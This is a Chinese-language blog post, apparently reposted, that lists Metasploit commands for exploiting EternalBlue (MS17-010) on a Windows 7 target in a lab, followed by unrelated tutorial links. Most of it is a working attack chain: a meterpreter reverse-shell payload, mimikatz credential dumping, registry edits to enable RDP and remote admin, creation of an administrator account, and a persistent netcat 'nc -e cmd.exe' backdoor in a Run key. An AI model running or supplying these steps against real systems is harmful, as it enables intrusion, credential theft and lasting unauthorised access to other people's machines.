msf永恒之蓝漏洞利用命令总结
一、 启动msf之前的准备工作
root@kali:~#service postgresql start
root@kali:~#msfdb init
root@kali:~#msfconsole
二、 查看是否存在漏洞
msf >search ms17_010寻找所需模块
msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)
msf >set RHOSTS 192.168.92.129(设置被扫描IP)
msf >run(进行扫描,观察是否存在该漏洞)
三、 漏洞攻击
msf >use
exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)
msf > set RHOST 192.168.92.129(被攻击机IP)
msf >set LHOST 192.168.92.132(设置本地IP)
msf >set LPORT 4444(设置连接端口)
msf >set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)
msf >show
options(查看配置相关信息)
msf >run(或者exploit,开始攻击)
四、 攻击成功!查看系统信息
meterpreter>sysinfo爆出系统信息
meterpreter>screenshot截屏,截屏后的图片存放在/root/中
meterpreter>upload xx.exe C:\yyy\xxx.exe 这条命令可以上传任意文件,后面会用到,上传后门
meterpreter
>shell 进入靶机cmd
如果连接到windows的shell显示乱码,使用如下命令
C:\Windows\system32>chcp 65001
五、 爆破密码的过程,使用mimikatz
首先查看是否开启3389端口,如果没有则使用以下命令在cmd中开启
C:\Windows\system32>netstat –ano 观察3389端口是否开启
C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
C:\Windows\system32>exit
meterpreter >
load mimikatz
meterpreter > msv <获取的账号信息是hash值>
meterpreter > ssp <获取的账号信息是明文信息>
meterpreter >
wdigest <读取内存中存放的账号密码明文信息>
meterpreter > kerberos <和上面类似>
六、 连接win7的远程桌面
重新打开一个命令界面
root@kali:~# rdesktop 192.168.92.129
输入刚才破解的用户名和密码。如果不使用破解的用户名和密码也可以自己创建一个用户名和密码,但必须赋予创建的账号相关权限
七、 创建账号的两种方法
1.通过shell进入靶机,在靶机里创建用户账号,然后添加到administrators用户组,使其也具有administrators权限,最后查看是否是管理员权限
meterpreter > shell
C:\Windows\system32>net user test1 123456 /add
C:\Windows\system32>net localgroup administrators test1 /add
C:\Windows\system32>net user test1
2.利用msf的post后渗透攻击模块,直接在meterpreter下创建,这种创建的账号直接就是administrators权限。
meterpreter > run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/enable_rdp USERNAME=test1 PASSWORD=12345
八、 上传后门nc
(ps:如果格式不正确,放在记事本里调一下格式或者换行,正常来说是没有换行的)
首先开启win7主机默认共享,以便远程执行命令
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
开放win7 443端口
C:\Windows\system32> netsh firewall add portopening TCP 443 "test" ENABLE
上传瑞士军刀nc.exe到windows主机上
eterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
将nc添加至启动项
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
开放win7 443端口
C:\Windows\system32>netsh firewall add portopening TCP 443 ENABLE
重启win7并测试后门
C:\Windows\system32>shutdown -r -f -t 0
重新打开一个会话界面测试后门,如果能直接进入靶机的shell,则说明后门上传成功,以后可以直接通过这条命令连接靶机
root@kali:~# nc -v 192.168.72.128 443
原文地址:https://www.cnblogs.com/maohai-kdg/p/12915718.html
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Go 使用标准库 net/rpc 包
- 强大的 Stream API(三)
- 微软发布代码智能新基准数据集CodeXGLUE,多角度衡量模型优劣
- 强大的 Stream API(二)
- 无限想象空间,用Python玩转3D人体姿态估计
- 300亿美元,AMD为什么要买Xilinx?
- Angular5.0.0新特性
- 用Python实现坦克大战游戏 | 干货贴
- android studio 3.0 升级 项目遇到的问题及更改思路(问题小结)
- Android Studio 3.0被调方法参数名提示的取消方法
- Pycharm中安装Pygal并使用Pygal模拟掷骰子(推荐)
- 解决python多线程报错:AttributeError: Can't pickle local object问题
- TensorFlow2.1.0最新版本安装详细教程
- Android仿京东首页秒杀倒计时
- 超实用的android自定义log日志输出工具类